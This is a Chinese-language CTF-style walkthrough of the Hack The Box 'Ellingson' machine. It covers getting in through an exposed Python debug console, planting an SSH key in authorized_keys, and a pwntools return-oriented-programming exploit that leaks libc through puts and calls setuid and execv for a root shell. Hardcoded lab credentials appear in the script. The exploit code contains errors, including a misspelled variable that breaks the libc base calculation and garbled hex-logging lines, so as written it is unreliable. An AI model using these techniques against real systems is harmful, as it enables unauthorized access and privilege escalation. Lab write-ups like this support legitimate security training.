Hack the box-Ellingson靶机

00x01  信息枚举

00x02  漏洞利用

收集不到什么特殊信息，80端口的http服务往往都是突破口，我们先从80的web下手

从页面源码中看到了几个链接，并对链接的参数进行猜测

Fuzz /articles/? 使程序出错发现python交互调试页面。

利用os.uname()，发现目标系统信息，并利用whoami和pwd找到用户和目标系统的当前路径

根据收集到的信息，我们可以将ssh公钥写入到目标的authroized_keys文件上实现免密登录

00x03  低权限shell

00x04  权限提升

exp编写

该exp利用将为我们提供一个交互式root shell。

from pwn import *                                                                                                                                                                                              

import binascii

context(terminal=["tmux", "new-windows"])

context(os="linux", arch="amd64")

s = ssh(host="10.10.10.139", user="margo", password="iamgod$08")

p = s.process("garbage")

junk = 'A' * 136

plt_main = p64(0x401619)

plt_puts = p64(0x401050)

got_puts = p64(0x404028)

pop_rdi  = p64(0x40179b)

pop_rsi  = p64(0x401799)

payload = junk + pop_rdi + got_puts + plt_puts + plt_main

p.sendline(payload)

p.recvuntil("access denied.")

leaked_puts = p.recv()[:8].strip().ljust(8, "\x00")

log.success("Leaked puts@GLIBC:  " + "0x" + binascii.hexlify(leaked_puts).decode("hex")[::-1].encode("hex"))

eaked_puts = u64(leaked_puts)

off_puts = 0x809c0

off_sys  = 0x4f440

off_exe  = 0xe4fa0

off_sh   = 0x1b3e9a

off_suid = 0xe5970

base_libc = leaked_puts - off_puts

log.success("GLIBC base address: " + "0x" + binascii.hexlify(p64(base_libc)).decode("hex")[::-1].encode("hex"))

libc_exe  = p64(base_libc + off_exe)

libc_sys  = p64(base_libc + off_sys)

libc_sh   = p64(base_libc + off_sh)

libc_suid = p64(base_libc + off_suid)

payload = junk + pop_rdi + p64(0) + libc_suid + pop_rdi + libc_sh + pop_rsi + p64(0) + p64(0xdeadbeef) + libc_exe

p.sendline(payload)

p.recvuntil("access denied.")

log.success("Enjoy your shell!")

p.interactive()

获取root.txt

root权限提升部分参考自https://hackso.me/ellingson-htb-walkthrough/